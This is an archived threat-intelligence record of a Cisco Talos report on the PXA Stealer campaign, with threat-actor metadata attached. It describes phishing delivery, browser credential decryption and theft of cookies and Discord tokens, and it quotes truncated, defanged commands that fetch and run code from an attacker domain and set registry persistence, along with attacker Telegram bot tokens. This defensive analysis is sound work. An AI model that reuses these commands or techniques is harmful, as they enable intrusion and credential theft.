{
	"id": "2e97618e-59ed-493b-8914-245857fab7fa",
	"created_at": "2026-04-06T00:22:21.767399Z",
	"updated_at": "2026-04-10T03:36:47.633673Z",
	"deleted_at": null,
	"sha1_hash": "64e16f591b24f7e10e085aa69fa0ef345daf2e37",
	"title": "New PXA Stealer targets government and education sectors for sensitive information",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4746736,
	"plain_text": "New PXA Stealer targets government and education sectors for sensitive information\r\nBy Joey Chen\r\nPublished: 2024-11-14 · Archived: 2026-04-05 16:45:40 UTC\r\nThursday, November 14, 2024 06:00\r\nCisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia.\r\nWe discovered a new Python program called PXA Stealer that targets victims’ sensitive information, including credentials for various online accounts, VPN and FTP clients, financial information, browser cookies, and data from gaming software.\r\nPXA Stealer has the capability to decrypt the victim’s browser master password and uses it to steal the stored credentials of various online accounts.\r\nThe attacker has used complex obfuscation techniques for the batch scripts used in this campaign.\r\nWe discovered the attacker selling credentials and tools in the Telegram channel “Mua Bán Scan MINI,” which is where the CoralRaider adversary operates, but we are not sure if the attacker belongs to the CoralRaider threat group or another Vietnamese cybercrime group.\r\nVictimology and targeted information\r\nThe attacker is targeting the education sector in India and government organizations in European countries, including Sweden and Denmark, based on Talos telemetry data.\r\nThe attacker’s motive is to steal the victim’s information, including credentials for various online accounts, browser login data, cookies, autofill information, credit card details, data from various cryptocurrency online and desktop wallets, data from installed VPN clients, gaming software accounts, chat messengers, password managers, and FTP clients.
\r\nhttps://blog.talosintelligence.com/new-pxa-stealer/\r\nPage 1 of 22\r\nAttacker’s infrastructure\r\nTalos discovered that the attacker was hosting malicious scripts and the stealer program on a domain, tvdseo[.]com, in the directories “/file”, “/file/PXA/”, “/file/STC/”, and “/file/Adonis/”. The domain belongs to a Vietnamese professional search engine optimization (SEO) service provider; however, we are not certain whether the attacker has compromised the domain to host the malicious files or has subscribed to get legitimate access while still using it for their malicious purposes.\r\nWe found that the attacker is using a Telegram bot for exfiltrating victims’ data. Our analysis of the payload, PXA Stealer, disclosed a few Telegram bot tokens and chat IDs controlled by the attacker.\r\nAttacker-controlled Telegram bot tokens\r\n7545164691:AAEJ4E2f-4KZDZrLID8hSRSJmPmR1h-a2M4\r\n7414494371:AAGgbY4XAvxTWFgAYiAj6OXVJOVrqgjdGVs\r\nAttacker-controlled Telegram chat IDs\r\n-1002174636072\r\n-1002150158011\r\n-4559798560\r\n-4577199885\r\n-4575205410\r\nAttacker’s underground activities\r\nWe identified the attacker’s Telegram account “Lone None,” which was hardcoded in the PXA Stealer program, and analyzed various details of the account, including the icon of Vietnam’s national flag and a picture of the emblem for Vietnam’s Ministry of Public Security, which aligns with our assessment that the attacker is of Vietnamese origin. Also, we found Vietnamese comments in the PXA Stealer program, which further strengthens our assessment.\r\nThe attacker’s Telegram account has biography data that includes a link to a private antivirus checker website that allows users or buyers to assess the detection rate of a malware program. 
This website provides a platform for potential threat actors to evaluate the effectiveness and stealth capabilities of the malware before purchasing it, indicating a sophisticated level of service and professionalism in the threat actor's operations.\r\nWe also discovered that the attacker is active in an underground Telegram channel, “Mua Bán Scan MINI,” mainly selling Facebook accounts, Zalo accounts, SIM cards, credentials, and money laundering data. Talos observed that this Vietnamese actor is also seen in the Telegram group in which the CoralRaider actor operates. However, we are not certain whether the actor is a member of the CoralRaider gang or another Vietnamese cybercrime group.\r\nTalos discovered that the attacker is also promoting another underground Telegram channel, “Cú Black Ads – Dropship,” by sharing a few automation tools to manage large numbers of user accounts in their channel and exchanging or selling information related to social media accounts, proxy services, and a batch account creator tool.\r\nThe tools shared by the attacker in the group are automated utilities designed to manage several user accounts. These tools include a Hotmail batch creation tool, an email mining tool, and a Hotmail cookie batch modification tool. The compressed packages provided by the threat actor often contain not only the executable files for these tools but also their source code, allowing users to modify them as needed.\r\nHotmail batch creation tool from Telegram channel.\r\nHotmail cookie batch modification tool from Telegram channel.
\r\nWe found that the attacker is not sharing all the tools for free, and some of them require users to send a unique key back to the Telegram channel administrator for software activation. This process ensures that only those who have been vetted or have paid for the tool can access its full functionality. We also discovered that these tools are distributed on other websites, such as aehack[.]com, highlighting that they are selling the tools. Additionally, a YouTube channel exists that provides tutorials on how to use these tools, further facilitating their widespread use and demonstrating the organized efforts to market and instruct potential users on their application.\r\nInfection Chain\r\nThe attacker gains initial access by sending a phishing email with a ZIP file attachment, according to our telemetry data. The ZIP file contains a malicious loader executable compiled in Rust and a hidden folder called Photos. The hidden folder has other nested folders, such as Documents and Images, that contain obfuscated Windows batch scripts and a decoy PDF document.\r\nWhen a victim extracts the attachment ZIP file, the hidden folder and the malicious Rust loader executable are dropped onto the victim machine. When the malicious Rust loader executable is run by the victim, it loads and executes multiple obfuscated batch scripts that are in the dropped hidden folders.\r\nWe deobfuscated the Windows batch scripts using CyberChef, with each step in the process being crucial and requiring precise execution to achieve accurate deobfuscation. First, we employed regular expressions (regex) to filter out random strings of uppercase and lowercase letters (A to Z). These random strings ranged in length from six to nine characters and were enclosed within “%” symbols. 
Next, we filtered out the “^” symbols and removed any remaining uppercase and lowercase letters (A to Z) as well as the special characters “_,” /’(?),” “$,” “#,” and “[].” Finally, we eliminated the “%” symbols and were able to successfully deobfuscate the scripts and reveal their PowerShell commands.\r\nSnippet of the obfuscated batch script.\r\nSnippet of the deobfuscated batch script.\r\nThe batch scripts execute PowerShell commands simultaneously, performing the following activities on the victim machine:\r\nOpens a decoy PDF document of a Glassdoor job application form.\r\nDownloads a portable Python 3.10 package archive masquerading as “synaptics.zip”, which is hosted on the attacker-controlled domain through the hardcoded URL “hxxps[://]tvdseo[.]com/file/synaptics[.]zip”, and saves it in the user profile’s temporary folder as well as in the public user’s folder with random file names, and extracts them.\r\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo [Net[.]ServicePointManager]::SecurityProtocol = [Net[.]Se\r\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo $dst = [System[.]IO[.]Path]::Combine([System[.]Environmen\r\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo Add-Type -AssemblyName System[.]IO[.]Compression[.]FileSy\r\nThen, it creates and runs a Windows shortcut file with the file name “WindowsSecurity.lnk”, configuring a base64-encoded command as a command line argument in the user profile’s temporary folder, and configures the “Run” registry key with the path of the shortcut file to establish persistence. 
\r\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo $s = $payload = import base64;exec(base64.b64decode('aW1w\r\nC:\\WINDOWS\\system32\\cmd[.]exe /S /D /c echo New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\\r\nThe Windows shortcut file, with a single-line Python script run by the disguised portable Python executable, downloads a base64-encoded Python program from a remote server. The downloaded program contains instructions to disable the antivirus programs on the victim’s machine.\r\ncmd[.]exe /c start \"\" /min C:\\Users\\Public\\oZHyMUy4qk\\synaptics[.]exe -c \"import urllib[.]request;im\r\nNext, the batch script continues to execute another PowerShell command that downloads the PXA Stealer Python program and executes it with the masqueraded portable Python executable “synaptics.exe” on the victim’s machine.\r\ncmd[.]exe /c start /min C:\\Users\\Public\\oZHyMUy4qk\\synaptics[.]exe -c import urllib[.]request;import\r\nAnother batch script called “WindowsSecurity.bat” is dropped in the Windows startup folder of the victim’s machine to establish persistence; it has the command to download and execute the PXA Stealer Python program shown in the earlier paragraph.\r\nPXA Stealer targets victims’ sensitive data\r\nPXA Stealer is a Python program that has extensive capabilities targeting a variety of data on the victim’s machine.\r\nWhen PXA Stealer is executed, it kills a variety of processes from a hardcoded list, including endpoint detection software, network capture and analysis processes, VPN software, cryptocurrency wallet applications, file transfer client applications, and web browser and instant messaging application processes by executing “taskkill” commands.\r\nDetection evasion function of PXA Stealer.
\r\nThe stealer has the capability of decrypting the browser master key, which is a cryptographic key used by web browsers like Google Chrome and other Chromium-based browsers to protect sensitive information, including stored passwords, cookies, and other data kept in encrypted form on the local system. The stealer accesses the master key file “Local State”, located in the browser folder of the user’s profile directory, which contains the encryption key used to encrypt the user data stored in the “Login Data” file, and decrypts it using the “CryptUnprotectData” function. This allows the attacker to gain access to the stored credentials and other sensitive browser information.\r\nBrowser master key decryption function of PXA Stealer.\r\nThe stealer also attempts to decrypt the master key that is stored in the key4.db file. Key4.db is a database used by Firefox (and some other Mozilla-based browsers) to store encryption keys, particularly the master key that encrypts sensitive data, such as saved passwords. The “getKey” function of the stealer is designed to extract and decrypt keys from the key4.db file using either AES or 3DES, depending on the encryption used for the stored key.\r\nBrowser master key decryption function of PXA Stealer.\r\nThe stealer attempts to retrieve user profile paths from the profiles.ini file of browser applications, including Mozilla Firefox, Pale Moon, SeaMonkey, Waterfox, Mercury, K-Meleon, IceDragon, Cyberfox, and BlackHawk for further processing, such as extracting saved passwords or other user data.\r\nThe stealer collects the victim’s login information from the browser’s login data file. 
The function “get_ch_login_data” of the stealer extracts login data, including URLs, usernames, and passwords, from the database “login_db”, which stores login information. The extracted login information is formatted into a string that includes the URL, username, decrypted password, browser, and profile.\r\nFor each login entry in the browser login database, the function checks if the URL contains any important keywords that are hardcoded in the stealer program, and if a match is found, the login information is saved in a separate file named “Important_Logins.txt” located in the “Browsers Data” folder within the user’s profile temporary directory. The function saves the results for all other login data found in the database to “All_Passwords.txt” in the “Browsers Data” folder.\r\nLogin credentials stealer function of PXA Stealer.\r\nThe stealer executes another function, “get_ch_cookies”, to extract cookies from a specified browser's cookie database, decrypt them, and save the results to a file. First, it checks if the cookies database file exists in the specified profile directory and unlocks the cookies database file. The database file is then copied to the temporary folder and is processed by executing an SQL query to retrieve cookie information, including host key, name, path, encrypted value, expiration time, secure flag, and HTTP-only flag, from the cookies database file.\r\nIf any Facebook cookies are found, they are concatenated into a single string called \"fb_formatted\", and it calls another function, \"ADS_Checker()\", to check for ads based on the Facebook cookies, and the results are written to a file called \"Facebook_Cookies.txt\". Any other cookie information is written to a text file named after the browser and the profile. 
Finally, the function removes the temporary cookie database file.\r\nBrowser cookies stealer function of PXA Stealer.\r\nIn another sample of the stealer, for the browsers Chrome, Chrome SxS, and Chrome(x86), it downloads and executes a cookie stealer JavaScript through the URL hxxps://tvdseo[.]com/file/PXA/Cookie_Ext.zip. The cookie stealer JavaScript connects to the Telegram bot with the token and chat ID hardcoded in the script, collects the cookies, and sends them to the attacker’s Telegram bot through the POST method.\r\nBrowser cookie stealer JavaScript.\r\nNext, the stealer targets the victim’s credit card information stored in the browser database “webappsstore.sqlite”. The function extracts and decrypts saved credit card information from a browser's web data database. It checks if the cards database file \"cards_db\" exists and copies it to the user’s profile temporary folder. It executes a SQL query to retrieve credit card information including name on card, expiration month/year, encrypted card number, and date modified. Then it decrypts the encrypted card number using the function “decrypt_ch_value” with the help of the decrypted master key. It writes the cards’ information to a text file and names it after the browser and the profile. Finally, it gets the count of credit card records that were found and deletes the temporary copy of the “cards_db” file.\r\nCredit card data stealer function of PXA Stealer.\r\nThe stealer extracts and saves the autofill form data from a browser's database to a text file with the file name format “$browser_$profile.txt” in a folder called “AutoFills” in the browser profile location.
\r\nAutofill data stealer function of PXA Stealer.\r\nThe stealer also extracts and validates Discord tokens stored in various browsers or Discord applications. It checks for the stored encrypted Discord tokens in the different browser database files and also in the application files of Discord, Discord Canary, Lightcord, and Discord PTB on the victim's machine by searching for strings using the regular expression \"r\"dQw4w9WgXcQ:[^.*\\['(.*)'\\].*$][^\\\"]*\")\". Once the encrypted tokens are found, it decrypts them with the function “decrypt_dc_tokens()” using the extracted master key from the \"Local State\" file that was used to encrypt the tokens. Then, it validates each decrypted Discord token to check if it is a legitimate Discord token and stores it by associating it with the browser name. Besides searching for the encrypted tokens, the function also looks for unencrypted Discord tokens by searching for strings that match the regular expression pattern \"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}\" for standard tokens and \"mfa\\.[\\w-]{84}\" for multi-factor authentication (MFA) tokens in \".log\" and \".ldb\" files in the LevelDB directory of Discord applications or web browsers, where structured key-value data is stored in LevelDB database format.\r\nDiscord token stealer function of PXA Stealer.\r\nThe stealer executes another function to extract the user information from the MinSoftware application database. It searches for the database file \"db_maxcare.sqlite\" in the victim machine folders, including Desktop, Documents, Downloads, and OneDrive, and in the logical partitions with the drive letters \"D:\\\" and \"E:\\\". Once found, it executes a SQL query against the accounts table of the database file and extracts the following data:\r\nuid: User identifier.\r\npass: User's password.\r\nfa2: Two-factor authentication data.
\r\nemail: The user's email address.\r\npassmail: The email password.\r\ncookie1: Likely a session or authentication cookie.\r\ntoken: Likely an authentication token.\r\ninfo: Account information.\r\nMinSoftware application data stealer function of PXA Stealer.\r\nThe stealer also has functionality for interacting with Facebook Ads Manager and the Graph API using a session authenticated via cookies:\r\nIt takes a Facebook cookie and parses it for the session information, such as “c_user”, and attempts to access the token.\r\nIt retrieves and formats the details about the user's ad accounts, such as account status, currency, balance, spend cap, and amount spent.\r\nIt gets the list of the user's Facebook pages, including page name, link, likes, followers, and verification status.\r\nIt retrieves a list of groups with administrative users.\r\nIt extracts Business Manager IDs associated with the account and retrieves ad account information under each Business Manager.\r\nIt uses Facebook data to determine ad account limits for a Business Manager.\r\nIt extracts the token from Facebook mobile pages to facilitate authenticated requests.\r\nFacebook data stealer function of PXA Stealer.\r\nAfter collecting the targeted victim's data, including the login data, browser cookies, autofill information, credit card details, Facebook ads account data, cryptocurrency wallet data, Discord token details, and MinSoft application data, the stealer creates a ZIP archive of all the files in the user profile’s temporary folder with the file name format \"CountryCode_Victim's public IP Computername.zip\", with a high compression level of value nine.
\r\nWhile creating the archive and navigating the targeted folders, the stealer excludes some of the directories, including user_data, emoji, tdummy, dumps, webview, update-cache, GPUCache, DawnCache, temp, Code Cache, and Cache. It also attempts to rename each file while adding it to the archive. The archive is exfiltrated to the actor’s Telegram bot. After exfiltrating the victim’s data, the stealer deletes the folders that contained the collected user data.\r\nExfiltration function of PXA Stealer.\r\nCoverage\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
\r\nAdditional protection with context to your specific environment and threat data is available from the Firewall Management Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat are listed below:\r\nSnort2: 64217, 64204, 64216, 64215, 64214, 64213, 64212, 64211, 64210, 64209, 64208, 64207, 64206, 64205, 64203\r\nSnort3: 301057, 301063, 301062, 301061, 301060, 301059, 64217, 301058\r\nClamAV detections are also available for this threat:\r\nWin.Loader.RustLoader-10036712-0\r\nPy.Infostealer.PXAStealer-10036718-0\r\nPy.Infostealer.PXAStealer-10036725-0\r\nTxt.Tool.PXAStealerInstaller-10036719-0\r\nTxt.Tool.PXAStealerInstaller-10036724-0\r\nLnk.Downloader.PXAStealer-10036720-0\r\nJs.Infostealer.CookieStealer-10036722-0\r\nIndicators of Compromise\r\nIOCs for this research can be found in our GitHub repository here.\r\nSource: https://blog.talosintelligence.com/new-pxa-stealer/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/new-pxa-stealer/"
	],
	"report_names": [
		"new-pxa-stealer"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b8c5ea0-a654-4b5c-b817-9e67b115059e",
			"created_at": "2024-04-19T02:00:03.625955Z",
			"updated_at": "2026-04-10T02:00:03.616114Z",
			"deleted_at": null,
			"main_name": "CoralRaider",
			"aliases": [],
			"source_name": "MISPGALAXY:CoralRaider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6a894c24-6f51-4863-9efb-7f1b3133c848",
			"created_at": "2024-06-20T02:02:10.260154Z",
			"updated_at": "2026-04-10T02:00:05.001393Z",
			"deleted_at": null,
			"main_name": "CoralRaider",
			"aliases": [],
			"source_name": "ETDA:CoralRaider",
			"tools": [
				"AsyncRAT",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lumma Stealer",
				"LummaC2",
				"NetSupport",
				"NetSupport Manager",
				"NetSupport Manager RAT",
				"NetSupport RAT",
				"NetSupportManager RAT",
				"Rhadamanthys",
				"Rhadamanthys Stealer",
				"RotBot",
				"XClient"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434941,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/64e16f591b24f7e10e085aa69fa0ef345daf2e37.pdf",
		"text": "https://archive.orkl.eu/64e16f591b24f7e10e085aa69fa0ef345daf2e37.txt",
		"img": "https://archive.orkl.eu/64e16f591b24f7e10e085aa69fa0ef345daf2e37.jpg"
	}
}